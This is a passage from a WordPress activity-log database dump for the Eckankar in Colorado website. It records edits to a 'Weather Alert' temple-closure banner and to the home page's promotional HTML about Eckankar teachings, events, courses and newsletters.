a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238070,40483,'_message_key','post_updated'),(238071,40483,'_user_id','2'),(238072,40483,'_user_login','S8zhaBda'),(238073,40483,'_user_email','nada@zipnadanot.org'),(238074,40483,'_server_remote_addr','76.130.120.x'),(238075,40483,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269147&action=edit'),(238076,40484,'widget_id_base','custom_html'),(238077,40484,'widget_name_translated','Custom HTML'),(238078,40484,'sidebar_id','null'),(238079,40484,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238080,40484,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238081,40484,'_message_key','widget_edited'),(238082,40484,'_user_id','2'),(238083,40484,'_user_login','S8zhaBda'),(238084,40484,'_user_email','nada@zipnadanot.org'),(238085,40484,'_server_remote_addr','76.130.120.x'),(238086,40484,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238087,40485,'setting_id','sidebars_widgets[boldgrid-widget-1]'),(238088,40485,'setting_old_value','[\n    \"custom_html-6\"\n]'),(238089,40485,'setting_new_value','[\n    \"custom_html-14\",\n    \"custom_html-6\"\n]'),(238090,40485,'control_id','sidebars_widgets[boldgrid-widget-1]'),(238091,40485,'control_label',''),(238092,40485,'control_type','sidebar_widgets'),(238093,40485,'_message_key','appearance_customized'),(238094,40485,'_user_id','2'),(238095,40485,'_user_login','S8zhaBda'),(238096,40485,'_user_email','nada@zipnadanot.org'),(238097,40485,'_server_remote_addr','76.130.120.x'),(238098,40485,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238099,40486,'setting_id','widget_custom_html[14]'),(238100,40486,'setting_old_value','[]'),(238101,40486,'setting_new_value','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238102,40486,'_message_key','appearance_customized'),(238103,40486,'_user_id','2'),(238104,40486,'_user_login','S8zhaBda'),(238105,40486,'_user_email','nada@zipnadanot.org'),(238106,40486,'_server_remote_addr','76.130.120.x'),(238107,40486,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238108,40487,'post_id','7160'),(238109,40487,'post_type','page'),(238110,40487,'post_title','Home'),(238111,40487,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"background-color: #db5656; padding-top: 23px; padding-bottom: 23px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"bg-font-family-alt color1-color\" style=\"text-align: center;\"><span style=\"font-family: arial black, sans-serif; font-size: 24pt;\">Weather Alert</span><br>\r\n<strong><span style=\"font-size: 18pt;\">The Colorado ECK Temple is closed today due to weather conditions.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238013,40477,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"background-color: #db5656; padding-top: 23px; padding-bottom: 23px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"bg-font-family-alt color1-color\" style=\"text-align: center;\"><span style=\"font-family: arial black, sans-serif; font-size: 24pt;\">Weather Alert</span><br>\r\n<strong><span style=\"font-size: 18pt;\">The Colorado ECK Temple is closed today due to weather conditions.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; 